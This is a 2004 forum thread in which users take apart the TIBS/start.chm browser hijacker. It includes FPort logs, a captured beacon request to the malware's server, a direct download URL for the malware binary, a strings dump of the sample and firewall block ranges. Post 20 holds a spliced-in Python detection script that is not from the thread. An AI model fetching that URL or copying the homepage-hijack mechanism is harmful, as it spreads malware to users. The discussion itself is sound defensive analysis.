Had this? "mk:@MSITStore:C:\WINDOWS\start.chm::/start.html"

Discussion in 'privacy problems' started by DB123, Apr 25, 2004.

Thread Status:
Not open for further replies.
  1. DB123

    DB123 Guest

    TIBS? Start.chm? Access[1].exe?

    Hey all,

    Something isn't right here. I've been hit with that mkstore problem that auto-executes rubbish on your system. Except this one just won't go away.

    You know the problem I'm talking about, so let me get right to it. First, I think creating a write protected 0 byte start.chm file prevents the thing from "infecting" your machine, but not running access[1].exe - killing the access[1].exe task prevents it from coming back. Second, I've seen a new variant of this which runs a cmd.exe that takes 100% cpu - killing that solves the problem.

    In brief. I've run ad-aware, spybot and hijack this. I know what I'm doing and the hijack this output shows nothing unusual. I tried to procdump the exe and disassemble it, but all I got was a load of garbage. I haven't tried softice on it yet.

    Does anyone know exactly how to confirm whether this thing is still on my machines, or whether it's just coming back when I'm browsing sites? If I know it's not there then I can at least start from a "known good" point when hacking it apart.

    An observation... It seems to return shortly after I go to EBay, which is somewhat interesting. Also if you boot up, use the system normally but don't run IE, the spyware doesn't start which leads me to believe it's either some cleverly hidden browser hook (which I really doubt), it's a hidden task that waits for iexplore.exe to load (which is possible, if the footprint is small enough the process won't show up), or it's coming back when browsing to a website.

    Any help on confirming it's not on my system is appreciated. Then I'll attack this little POS with my trusty copy of wdasm... Rule #1 for whatever idiot wrote this, never annoy a coder.
     
  2. dvk01

    dvk01 Global Moderator

    Joined:
    Oct 9, 2003
    Posts:
    3,131
    Location:
    Loughton, Essex. UK
  3. DB123

    DB123 Guest

    Re: TIBS? Start.chm? Access[1].exe?

    If you mean the one posted at April 22nd, 2004, 04:47 AM by Unzy, titled

    "Re: CWS Variants
    start.chm / MSITStore (MasterSearch)

    A new type of CWS variant that uses an exploit to reset a user's homepage."

    That doesn't help much :). I don't have those browser pages set, and the thing keeps coming back.

    I'm just not convinced that by removing the chm, the .exe process and the pages it removes the spyware. It's coming back somehow, and unless Ebay or Yahoo are using it then it's got to be from the local machine.
     
  4. dvk01

    dvk01 Global Moderator

    Joined:
    Oct 9, 2003
    Posts:
    3,131
    Location:
    Loughton, Essex. UK
    Re: TIBS? Start.chm? Access[1].exe?

    look at my edit saying about emptying temp files

    several hijackers are using the exploit now, not just MasterSearch
     
  5. DB123

    DB123 Guest

    Re: TIBS? Start.chm? Access[1].exe?

    Nothing there except an interesting batch file that doesn't do anything...
     
  6. Grumble

    Grumble Registered Member

    Joined:
    Apr 25, 2004
    Posts:
    185
    Location:
    the sunshine state
    Re: TIBS? Start.chm? Access[1].exe?

    Hey guest, I noticed that even with CWShredder & HJT clean & no start.chm file present, the thing seems to do this: when any app initially connects to the internet, or any type of help file is accessed, shortly afterward an additional TCP connect is made under that process to an IP in Russia, which then closes quickly. You can't see it with netstat; I used Port Explorer to watch it and identify the IP (which is the same each time).

    I'm beginning to think it may be able to eventually download the new start.chm & registry crap after repeating this with virtually every process that connects to the net.

    Anyway, since I blocked the IP range 81.211.105.* from leaving my router & banned the IP range from incoming at my computer firewall, none of the start.chm or registry crap has reappeared (5 days now). The critter still tries to call home with each process that accesses the net, but it can't get out anymore. If you use a tool like Port Explorer you should be able to see it on your machine. Hope this helps.
     
  7. DB123

    DB123 Guest

    Re: TIBS? Start.chm? Access[1].exe?

    Interesting, thanks for adding that.

    Next time it happens, can you try using FPORT on it? FPort maps network connections to processes & files, you can get it from Foundstone (http://www.foundstone.com/knowledge/proddesc/fport.html). That will tell you what is making the outgoing connection...
     
  8. tbyrnes

    tbyrnes Registered Member

    Joined:
    Apr 20, 2004
    Posts:
    15
    Re: TIBS? Start.chm? Access[1].exe?

    I think you guys might be on to something here. I've had the same inability to completely remove this virus. I get everything cleaned up, and as soon as I reboot, Spyware Guard tells me something is trying to change my home page again. After reading this post, it hit me that this occurs right after my startup process starts something called NIS Time, which is a software tool to check/set the system time. This is the first time anything on my PC tries to go out over the net.

    I downloaded Fport and tried running it. I get the following results:


    FPort v2.0 - TCP/IP Process to Port Mapper
    Copyright 2000 by Foundstone, Inc.
    http://www.foundstone.com

    Pid Process Port Proto Path
    284 svchost -> 135 TCP C:\WINDOWS\system32\svchost.exe
    4 System -> 139 TCP
    4 System -> 445 TCP
    992 svchost -> 1025 TCP C:\WINDOWS\System32\svchost.exe
    4 System -> 1026 TCP
    1660 Explorer -> 1355 TCP C:\WINDOWS\Explorer.EXE
    1624 -> 5000 TCP
    3084 aim -> 5180 TCP C:\Program Files\AIM95\aim.exe

    0 System -> 123 UDP
    0 System -> 137 UDP
    0 System -> 138 UDP
    284 svchost -> 445 UDP C:\WINDOWS\system32\svchost.exe
    4 System -> 1027 UDP
    1660 Explorer -> 1032 UDP C:\WINDOWS\Explorer.EXE
    1624 -> 1100 UDP
    992 svchost -> 1148 UDP C:\WINDOWS\System32\svchost.exe
    0 System -> 1900 UDP
    3084 aim -> 1900 UDP C:\Program Files\AIM95\aim.exe

    What I'm not clear on is how I could use this tool to see what is trying to get to the Russian IP address. FPort seems to take a snapshot of port ownership. If something is grabbing a port to reach out to the Russian IP, then almost immediately releases that port, how would this catch it? I'm wondering if I should download and try ZoneAlarm. If I recall, you can set that so anything that tries to access the net will get flagged and held up pending permission.

    Tim
     
  9. tbyrnes

    tbyrnes Registered Member

    Joined:
    Apr 20, 2004
    Posts:
    15
    Re: TIBS? Start.chm? Access[1].exe?

    Ok, I installed Zone Alarm and set it to require permissions before anything goes out over the internet. I disabled my NISTIME because of timing problems - it seemed to want to do its thing before ZoneAlarm was fully initialized. The following files requested access to the internet as part of start up processes:

    svchost.exe
    explorer.exe
    msbntray.exe

    The Spyware Guard message about my home page being changed popped up after I granted access for explorer.exe to use the net. I wonder if the virus is somehow attaching to that file?

    Tim
     
  10. dvk01

    dvk01 Global Moderator

    Joined:
    Oct 9, 2003
    Posts:
    3,131
    Location:
    Loughton, Essex. UK
    Re: TIBS? Start.chm? Access[1].exe?

    explorer shouldn't need to access the net, you should block that with ZA

    the svchosts entries will need to access and msbntray will

    we know that a lot of the cws baddies attach to explorer, that is why we had you run the pv looking for the dll that had attached itself
    and nothing was showing in your logs
     
  11. tbyrnes

    tbyrnes Registered Member

    Joined:
    Apr 20, 2004
    Posts:
    15
    Re: TIBS? Start.chm? Access[1].exe?

    Derek, which PV option was that? I think I was asked to use option 1 and option 7 at different points. Whichever is the right one, I'd like to try again if you don't mind since explorer.exe seems to want to talk to the internet.

    Thanks. Want me to post the results back over in my own thread?

    Tim
     
  12. dvk01

    dvk01 Global Moderator

    Joined:
    Oct 9, 2003
    Posts:
    3,131
    Location:
    Loughton, Essex. UK
    Re: TIBS? Start.chm? Access[1].exe?

    either option 1 or 2 are the explorer & Internet Explorer DLLs
    but if they didn't show last time, they aren't likely to show this time
     
  13. Grumble

    Grumble Registered Member

    Joined:
    Apr 25, 2004
    Posts:
    185
    Location:
    the sunshine state
    Re: TIBS? Start.chm? Access[1].exe?

    I don't think you will see it with FPort. PE shows real time events as they happen, and logs the events, second by second.

    The TCP connect happens, then exactly 21 seconds later it closes. The same process that made the net connection (for example, iexplore.exe), same PID, is the process that does the connect to the Russian IP but on another local port (looks like the next available port), and with 0.0.0.0 local address rather than 192.168.x.x.

    If I have the Ruskie IP blocked from outgoing to the WAN at the router, the Ruskie port closes 21 seconds after it opens and that's all. If the Ruskie IP is not blocked from outgoing to the WAN, the Ruskie port closes 21 seconds after it opens, AND THEN for a few minutes the remote Ruskie IP port 80 will try some incoming connects to my computer (2 times on three different ports, then quit). The incoming attempts are blocked at my firewall and logged there since I've got the IP entered as an incoming banned IP.

    It's not only iexplore.exe connecting to the net that gets the Ruskie IP in action, but also other stuff like mcafee security center processes that connect to the net.

    I'm getting kinda blurry-eyed from looking at these logs & stuff now, but maybe I ought to run some kind of dll checks sometime and have the guys here check 'em out.
     
  14. ArcdEvilz

    ArcdEvilz Registered Member

    Joined:
    Apr 25, 2004
    Posts:
    2
  15. Rakewell

    Rakewell Guest

    Re: TIBS? Start.chm? Access[1].exe?

    The same thing is happening to me. Since I created the readonly start.chm and start.html files, my browser isn't being hijacked anymore. But I'm still getting the access[1].exe files and the high-CPU cmd.exe's.

    I installed Port Explorer, and am seeing the same behaviour DB123 described -- namely, normal connections are followed by a connection to 81.211.105.70.

    With Port Explorer, I was able to see what was in those connections:

    GET /report/reportsync.php?cid=64446bc9-e268-4a54-8597-ec057ab4dcfc HTTP/1.1
    Accept: */*
    XXXXXXXXXXXXXXX: XXXXXXXXXXXXX
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    Host: main.tibssystems.com
    Connection: Keep-Alive

    This downloads access.exe, which gets stored in the cache and executed as access[1].exe.

    You can get the access.exe file by going directly to http://81.211.105.70/report/reportsync.php. Obviously, just save it. Can someone disassemble it and tell us what it's latching itself onto so that we can get rid of it once and for all?
     
  16. Pieter_Arntz

    Pieter_Arntz Spyware Veteran

    Joined:
    Apr 27, 2002
    Posts:
    13,330
    Location:
    Netherlands
    Re: TIBS? Start.chm? Access[1].exe?

    Can anyone get me a sample of the access[1].exe ?

    I think it holds the solution to this mystery.

    (Got plenty, thanks to all that submitted)
    Preferably zipped up, so it doesn't get intercepted by any AV-scanners.

    Regards,

    Pieter
     
    Last edited: Apr 27, 2004
  17. dempapa

    dempapa Registered Member

    Joined:
    Apr 23, 2004
    Posts:
    16
    Re: TIBS? Start.chm? Access[1].exe?

    I too have this hacker on my PC and have been frustrated because it's unknown how to remove all components and all suggested solutions are about hiding the symptoms rather than curing the disease.

    I don't want to take over this posting, just wanted to say that this is the most convincing posting I've seen in terms of finding a solution and wish you guys well.
     
  18. DB123

    DB123 Guest

    Re: TIBS? Start.chm? Access[1].exe?

    Okay, I'm at work at the minute but wanted to add this.

    If anyone can send me the flat access[1].exe file, I can disassemble it. Alternatively we need to find out how it gets launched. The reason for this is as follows.

    The aim is to get the exe in a "virgin" state on disk to disassemble. Simply ripping it out of memory with procdump won't do this as the exe will by definition change its internal states as it executes.

    What we need to do is to find the launch point. When we know that, we can set a bpx (breakpoint in execution) in Softice, and find the first line of code of the exe. We then change that to a jmp esi, which puts it in an infinite loop. Then we can use procdump to get a virgin copy that can be disassembled. It's the same technique used to reverse engineer upx'd & compressed exe's.

    The post above about the php file is very promising. What's annoying is I patched hh.exe (the CHM file reader for Windows) to prompt whenever a CHM file was executed - it didn't warn me, but access[1].exe came back. So the comment I read elsewhere about preventing chm files from being launchable doesn't seem to hold true.

    Are there any other coders/reverse engineers/crackers here that can work with me on this?
     
  19. Gurth

    Gurth Registered Member

    Joined:
    Apr 26, 2004
    Posts:
    1
    Location:
    Midwest, USA
    Re: TIBS? Start.chm? Access[1].exe?

    I found 5 ACCESS[1].EXE-*.pf files in my c:\windows\prefetch dir that might help...

     
  20. dvk01

    dvk01 Global Moderator

    Joined:
    Oct 9, 2003
    Posts:
    3,131
    Location:
    Loughton, Essex. UK
    Re: TIBS? Start.chm? Access[1].exe?

    this cws hijacker comes back normally and we are still working on ways to kill it off permanently
    what works for some doesn't work for others, but some get rid of it fairly easily

    a workaround seems to be install a good firewall, lists here http://www.wilders.org/firewalls.htm and block these ranges of ports, both incoming and outgoing 209.66.114.0-209.66.115.255 and 81.211.105.0-81.211.105.255
    that stops the known cws servers responding or the hidden files on your computer updating. This works sometimes but not always, but it's a help. The problem with this approach is that some good sites might also be blocked
    then
    kill it off using shredder etc and hjt as advised while disconnected from the net
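    As an added example (not code from this thread or from any of the tools named in it), here is a Python script that encodes Grumble's observation from post 13 and dvk01's block list from post 20: it collapses the two address ranges into CIDR networks and scans a constructed, Port Explorer-style connection log for the pattern described, namely a process that has just made a normal connection opening a second socket from 0.0.0.0 to a blocked address and closing it about 21 seconds later. The log layout, the timestamps and the legitimate-host addresses are assumptions; the only address taken from the thread is 81.211.105.70.

```python
import ipaddress
from datetime import datetime, timedelta

# Address ranges dvk01 recommends blocking in post 20, as first-last pairs.
BLOCK_RANGES = [("81.211.105.0", "81.211.105.255"),
                ("209.66.114.0", "209.66.115.255")]

def ranges_to_networks(ranges):
    """Collapse first-last pairs into the CIDR networks a firewall rule wants."""
    nets = []
    for first, last in ranges:
        nets.extend(ipaddress.summarize_address_range(
            ipaddress.ip_address(first), ipaddress.ip_address(last)))
    return nets

BLOCKED = ranges_to_networks(BLOCK_RANGES)

def is_blocked(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in BLOCKED)

# Constructed log in an assumed Port Explorer-like layout (not real tool output):
#   time pid process local_ip:port remote_ip:port event
# Legitimate hosts use documentation addresses; 81.211.105.70 is the IP from post 15.
SAMPLE_LOG = """\
12:00:01 1660 iexplore.exe 192.168.1.5:1355 198.51.100.20:80 OPEN
12:00:02 3084 aim.exe 192.168.1.5:5180 203.0.113.9:5190 OPEN
12:00:03 1660 iexplore.exe 0.0.0.0:1356 81.211.105.70:80 OPEN
12:00:24 1660 iexplore.exe 0.0.0.0:1356 81.211.105.70:80 CLOSE
12:05:10 1660 iexplore.exe 192.168.1.5:1357 198.51.100.21:80 OPEN
"""

def parse_log(text):
    """Turn whitespace-separated log lines into event dicts with typed fields."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        stamp, pid, proc, local, remote, event = line.split()
        events.append({"time": datetime.strptime(stamp, "%H:%M:%S"),
                       "pid": int(pid), "proc": proc,
                       "local_ip": local.rsplit(":", 1)[0],
                       "remote_ip": remote.rsplit(":", 1)[0],
                       "event": event})
    return events

def find_callbacks(events, window=timedelta(seconds=30)):
    """Flag each OPEN to a blocked address that follows, within `window`, an OPEN by
    the same PID to a non-blocked host; report how long the flagged socket lived."""
    findings = []
    opens = [e for e in events if e["event"] == "OPEN"]
    for e in opens:
        if not is_blocked(e["remote_ip"]):
            continue
        # Earlier normal connections by the same PID inside the window (the "trigger").
        triggers = [p for p in opens
                    if p["pid"] == e["pid"] and not is_blocked(p["remote_ip"])
                    and timedelta(0) <= e["time"] - p["time"] <= window]
        # Matching CLOSE, if logged, to measure the socket's lifetime.
        close = next((c for c in events if c["event"] == "CLOSE"
                      and c["pid"] == e["pid"] and c["remote_ip"] == e["remote_ip"]
                      and c["time"] >= e["time"]), None)
        findings.append({
            "pid": e["pid"], "proc": e["proc"], "remote": e["remote_ip"],
            "triggered_by": triggers[-1]["remote_ip"] if triggers else None,
            "lifetime_s": int((close["time"] - e["time"]).total_seconds()) if close else None,
            "wildcard_local": e["local_ip"] == "0.0.0.0"})
    return findings
```

    On the sample log this reports one finding: PID 1660 (iexplore.exe) reaching 81.211.105.70 two seconds after its normal connection, from 0.0.0.0, with the socket living 21 seconds.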
     
  21. DB123

    DB123 Guest

    Re: TIBS? Start.chm? Access[1].exe?

    Gurth, thanks for the offer but the -pf is junk. Rakewell got it in 1, download that with a dl manager (getright, flashget), rename it to an exe and it's a valid PE file.

    Here's a start, don't have much time right now but I'll set up a sandbox and start hitting this POS. It was coded with Visual C++ (VC6 I believe). Here's some interesting strings in the table (just look at the end of the line, the start is the offset and the type). The worrying one is "wininet.dll", it might be patching it. My wininets are all the right size & date, so perhaps Windows FileProt fixed it for me...

    24672,Char,11,tibsystems.
    24684,Char,13,statsbank.com
    24700,Char,15,boards.cexx.org
    24716,Char,22,adultwebmasterinfo.com
    24740,Char,12,spywareinfo.
    24756,Char,15,dialerschutz.de
    24772,Char,18,webmasterworld.com
    24804,Char,18,go****yourself.com
    24824,Char,17,FindCloseUrlCache
    24844,Char,22,FindNextUrlCacheEntryA
    24868,Char,23,FindFirstUrlCacheEntryA
    24892,DLL,11,wininet.dll
    24970,Char,22,if exist %1 goto start
    25012,Char,41,SOFTWARE\Microsoft\Internet Explorer\Main
    25056,Char,10,Start Page
    25068,Char,13,::/start.html
    25084,Char,14,mk:@MSITStore:
    25100,Char,10,\start.chm
    37287,Char,11,/$FIftiMain
    37318,Char,15,/arrow_left.gif
    37340,Char,16,/arrow_right.gif
    37363,Char,13,/ham01000.jpg
    37383,Char,13,/ham01001.jpg
    37403,Char,13,/ham01100.jpg
    37423,Char,13,/ham01200.jpg
    37443,Char,13,/ham01300.jpg
    37463,Char,13,/ham01400.jpg
    37483,Char,13,/ham01500.jpg
    37503,Char,13,/ham01600.jpg
    37523,Char,13,/ham01700.jpg
    37543,Char,13,/ham01800.jpg
    37563,Char,13,/ham01900.jpg
    37583,Char,13,/ham02000.jpg
    37603,Char,13,/ham02001.jpg
    37623,Char,13,/ham02100.jpg
    37643,Char,13,/ham02200.jpg
    37663,Char,13,/ham03000.jpg
    37683,Char,13,/ham04000.jpg
    37703,Char,13,/ham05000.jpg
    37723,Char,13,/ham06000.jpg
    37743,Char,13,/ham07000.jpg
    37763,Char,13,/ham08000.jpg
    37783,Char,13,/ham09000.jpg
    37818,Char,13,/mo000000.jpg
    37853,Char,12,/poker_t.gif
    37872,Char,11,/start.html
    37889,Char,13,/sto00000.gif
    37909,Char,13,/to000000.jpg
    37929,Char,20,::DataSpace/NameList
    37951,Char,42,<:):DataSpace/Storage/MSCompressed/Content
    37998,Char,46,P,::DataSpace/Storage/MSCompressed/ControlData
    38047,Char,42,)::DataSpace/Storage/MSCompressed/SpanInfo
    38092,Char,48,/::DataSpace/Storage/MSCompressed/Transform/List
    38141,Char,98,<&_::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/
    38242,Char,106,i::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/ResetTable
    41266,Unichar,12,Uncompressed
    41294,Unichar,12,MSCompressed
    41320,Unichar,19,{7FC28940-9D31-11D0
    41474,Char,21,HHA Version 4.74.8702
    41540,Char,10,start.html
    70070,Char,10,vs3+:D)&Op
    83737,Char,11,S7K$Lj9SVlX


    Here are the interesting imports:

    22006,Function,11,FreeLibrary
    22020,Function,14,GetProcAddress
    22038,Function,12,LoadLibraryA
    22066,Function,14,FindFirstFileA
    22096,Function,12,GetTickCount
    22124,Function,12,GetTempPathA
    22140,Function,23,GetEnvironmentVariableA
    22166,Function,18,GetModuleFileNameA
    22200,Function,11,CloseHandle
    22226,Function,11,CreateFileA
    22240,Function,12,LockResource
    22256,Function,12,LoadResource
    22272,Function,13,FindResourceA
    22296,Function,14,SizeofResource
    22326,Function,14,GetProcessHeap
    22354,DLL,12,KERNEL32.dll
    22370,Function,21,GetKeyboardLayoutList
    22392,DLL,10,USER32.dll
    22406,Function,11,RegCloseKey
    22420,Function,14,RegSetValueExA
    22438,Function,13,RegOpenKeyExA
    22452,DLL,12,ADVAPI32.dll
    22468,Function,13,ShellExecuteA
    22482,DLL,11,SHELL32.dll
    22496,Function,16,GetModuleHandleA
    22516,Function,15,GetStartupInfoA
    22534,Function,15,GetCommandLineA
    22552,Function,10,GetVersion
    22566,Function,11,ExitProcess
    22580,Function,16,TerminateProcess
    22600,Function,17,GetCurrentProcess
    22620,Function,24,UnhandledExceptionFilter
    22648,Function,23,FreeEnvironmentStringsA
    22674,Function,23,FreeEnvironmentStringsW
    22700,Function,19,WideCharToMultiByte
    22722,Function,21,GetEnvironmentStrings
    22746,Function,22,GetEnvironmentStringsW
    22772,Function,14,SetHandleCount
    22790,Function,12,GetStdHandle
    22806,Function,11,GetFileType
    22820,Function,13,GetVersionExA
    22836,Function,11,HeapDestroy
    22850,Function,10,HeapCreate
    22864,Function,11,VirtualFree
    22890,Function,12,VirtualAlloc
    22906,Function,11,HeapReAlloc
    22954,Function,19,MultiByteToWideChar
    22976,Function,12,LCMapStringA
    22992,Function,12,LCMapStringW
    23008,Function,14,GetStringTypeA
    23026,Function,14,GetStringTypeW
     
    Last edited by a moderator: Apr 26, 2004
  22. DB123

    DB123 Guest

    Re: TIBS? Start.chm? Access[1].exe?

    Okay, I'm convinced we're missing something. The only sites I've been to have been known-good ones. So unless this site, Ebay, yahoo or NukeCops are causing this spyware to be downloaded, it's still on my machine.

    Anyone got any ideas? There's no point disasm'ing this thing if I can't get it cleaned...
     
  23. DB123

    DB123 Guest

    Re: TIBS? Start.chm? Access[1].exe?

    Another possibility. I think EBay may be involved. I tracked down the copy of Access[1].exe to the exact time I was logged into my ebay UK account. In Ebay UK "My Account", there is a banner advert top-center of the page - I'm wondering if one of the adverts they show is causing this hijack.

    Incidentally you won't be able to find the exe in the IE cache/history, you'll have to reboot and delete everything in your profile/local settings/temporary internet files from a cmd prompt or non-Explorer tool (such as DOpus).

    Can anyone with an EBay UK account keep an eye out and see if they see anything similar?
     
  24. dempapa

    dempapa Registered Member

    Joined:
    Apr 23, 2004
    Posts:
    16
    Re: TIBS? Start.chm? Access[1].exe?

    It's nothing specific to eBay.

    The hacker waits until you connect to the internet then downloads its stuff. If you make a connection using say Outlook hooked up to your hotmail account you'll experience the same problem.

    Read around and look at the many other postings on this virus and you'll see what people are discovering about this new pest.
     
  25. Rakewell

    Rakewell Guest

    Re: TIBS? Start.chm? Access[1].exe?

    It could be anything. Maybe a banner that eBay is displaying, or maybe something in a person's ad. I don't know.

    What concerns me more is the possibility that the infection (the part that makes IE go pull down that php file) comes from a different source, and access[1].exe doesn't actually infect machines. In which case, reverse engineering access[1].exe won't tell us how to make IE stop pulling it down.

    Maybe all access[1].exe does is pop up the $3.5 million lottery window via cmd.exe? (I've always killed cmd.exe to get rid of that popup, so I don't know what happens when you click either button.)

    Actually, what you posted doesn't include the string about $3.5M, but it was in another post here where someone posted their results of disassembling access.exe. I wonder if there are multiple versions or if it mutates? What's the md5 hash on the version you've got? (I'm not sure how to get the hash in plain Windows. I've got cygwin and it includes md5sum.)

    The hash on the version I have is: f56b2442dcd2f553b2fdd060c00bf99e
     